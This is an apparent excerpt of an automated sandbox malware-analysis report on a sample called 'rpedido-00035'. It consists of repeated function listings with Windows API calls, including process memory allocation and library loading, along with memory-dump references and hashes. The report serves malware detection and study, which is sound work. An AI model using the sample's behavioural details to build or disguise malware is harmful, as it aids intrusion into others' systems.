                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
                                                          • Instruction ID: 1a1db7b112f5c349f32c040b215ce8adb2231ea54f988815808aa67dfaaa6b76
                                                          • Opcode Fuzzy Hash: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
                                                          • Instruction Fuzzy Hash: 6AA15271E04228CBDF28CFA8C8446ADBBB1FF44305F14816ED856BB281D7786A86DF45
                                                          Function 004070F0 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
                                                          • Instruction ID: 81ced8d75bd8cd674d530aa485ef516b0f39a629971cfce93107e9c84bdcedbb
                                                          • Opcode Fuzzy Hash: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
                                                          • Instruction Fuzzy Hash: 4E912170E04228CBDF28CFA8C8547ADBBB1FB44305F14816ED856BB281D778A986DF45
                                                          Function 00406E06 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                          • Instruction ID: 6e186065c07e551db02da0b657444ed8a40fac9cbefa0218a87430385e41b7b0
                                                          • Opcode Fuzzy Hash: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                          • Instruction Fuzzy Hash: F7814571E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB281C778A996DF45
                                                          Function 0040690B Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
                                                          • Instruction ID: 1a645af2666a8cd9619cdf871bd9e2c738fb6a6c353dc56c4864b2e7a25bf22b
                                                          • Opcode Fuzzy Hash: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
                                                          • Instruction Fuzzy Hash: 71816771E04228DBEF28CFA8C8447ADBBB1FB44301F14816AD956BB2C1C7786986DF45
                                                          Function 00406D59 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
                                                          • Instruction ID: b0583babc1dad824d13d86abae56a1a356e3ceb45be48e511182641c275db258
                                                          • Opcode Fuzzy Hash: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
                                                          • Instruction Fuzzy Hash: 8C712471E04228CFDF28CFA8C9447ADBBB1FB44305F15806AD856BB281D7386996DF45
                                                          Function 00406E77 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
                                                          • Instruction ID: 968097f9e37e498ed83c4652799cdf8e1ebeb5c7fee57b8dc09d96684c556b9e
                                                          • Opcode Fuzzy Hash: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
                                                          • Instruction Fuzzy Hash: 27712471E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786996DF45
                                                          Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
                                                          • Instruction ID: 737cb098acab11621bc79b115fd6dc57f162d32c21417d2b0fd17844244e9397
                                                          • Opcode Fuzzy Hash: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
                                                          • Instruction Fuzzy Hash: 5A714571E04228CFEF28CF98C8447ADBBB1FB44305F14806AD956BB281C778A996DF45
                                                          Function 004032C2 Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004032D6
                                                            • Part of subcall function 00403441: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 00403309
                                                          • SetFilePointer.KERNELBASE(0014BE55,00000000,00000000,00414ED0,00004000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000), ref: 00403404
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: FilePointer$CountTick
                                                          • String ID:
                                                          • API String ID: 1092082344-0
                                                          • Opcode ID: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
                                                          • Instruction ID: 8a5bf560653b24f1bd3cd60389d49066fb51751ebaffca469d7b7cf87711dc5f
                                                          • Opcode Fuzzy Hash: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
                                                          • Instruction Fuzzy Hash: 10316C72610211DBD711DF29EEC49A63BA9F78439A714823FE900B62E0CBB95D058B9D
                                                          Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402057
                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                            • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                            • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00402068
                                                          • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 334405425-0
                                                          • Opcode ID: 44d570d4ef42a6af9798bac81a48d6e43403590213f26621d83d999ce1ed40c7
                                                          • Instruction ID: efb744b1bbbaa1f1e58e2693dd3ff93cd36a27706c6aad24c330354b17a2434d
                                                          • Opcode Fuzzy Hash: 44d570d4ef42a6af9798bac81a48d6e43403590213f26621d83d999ce1ed40c7
                                                          • Instruction Fuzzy Hash: 6F21C531900218EBCF20AFA5CE4CA9E7A70AF04354F60413BF610B61E1DBBD4991DA6E
                                                          Function 00401B71 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 00401BE1
                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree
                                                          • String ID: Call
                                                          • API String ID: 3394109436-1824292864
                                                          • Opcode ID: 6a27723cd33979d5ccceb52c727bba02617a76204f9552189d3104983f6bb1b5
                                                          • Instruction ID: 81df35259a3df780e2a5f09322996839f14f5544e2eb4a40810e3e9637107665
                                                          • Opcode Fuzzy Hash: 6a27723cd33979d5ccceb52c727bba02617a76204f9552189d3104983f6bb1b5
                                                          • Instruction Fuzzy Hash: 06218E72A40140DFDB20EB949E8495E77B9AF44314B25413BFA02F72D1DB789851CB9D
                                                          Function 004024F2 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp,00000000,00000011,00000002), ref: 00402551
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Enum$CloseValue
                                                          • String ID:
                                                          • API String ID: 397863658-0
                                                          • Opcode ID: 297b237e24fbbf63aa7ca08728d7b3950c3333922afcc1c5b6d3d1192ed08725
                                                          • Instruction ID: 4fa2f3c06f6248971957712acf2942ced6ba336c37b2851dfbda8b2cd28c17b0
                                                          • Opcode Fuzzy Hash: 297b237e24fbbf63aa7ca08728d7b3950c3333922afcc1c5b6d3d1192ed08725
                                                          • Instruction Fuzzy Hash: 6D017171904104EFE7159FA5DE89ABFB6B8EF44348F10403EF105A62D0DAB84E459B69
                                                          Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(00000000), ref: 1000295B
                                                          • GetLastError.KERNEL32 ref: 10002A62
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44573575588.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.44573549222.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.44573601928.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.44573630402.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: AllocErrorLastVirtual
                                                          • String ID:
                                                          • API String ID: 497505419-0
                                                          • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                          • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                          • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                          • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                          Function 004031BA Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 004031DF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
                                                          • Instruction ID: 4c6ae7a0626839fce45d877b24888c0af913333af22313e68c4d1644c71cb298
                                                          • Opcode Fuzzy Hash: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
                                                          • Instruction Fuzzy Hash: 3B319C3020021AFFDB109F95ED84ADB3F68EB04359B1085BEF904E6190D778CE509BA9
                                                          Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp,00000000,00000011,00000002), ref: 00402551
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          • API String ID: 3356406503-0
                                                          • Opcode ID: a3b88ef37a04c447d509aafcd647c8bb55f7a85eb83bcf9e8b78a58130226466
                                                          • Instruction ID: 2d27e3624369fee7c217219a4e344138e42523264533ea489648bddc6477d6d2
                                                          • Opcode Fuzzy Hash: a3b88ef37a04c447d509aafcd647c8bb55f7a85eb83bcf9e8b78a58130226466
                                                          • Instruction Fuzzy Hash: 53119171900209EBEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D7B84A45DB5A
                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
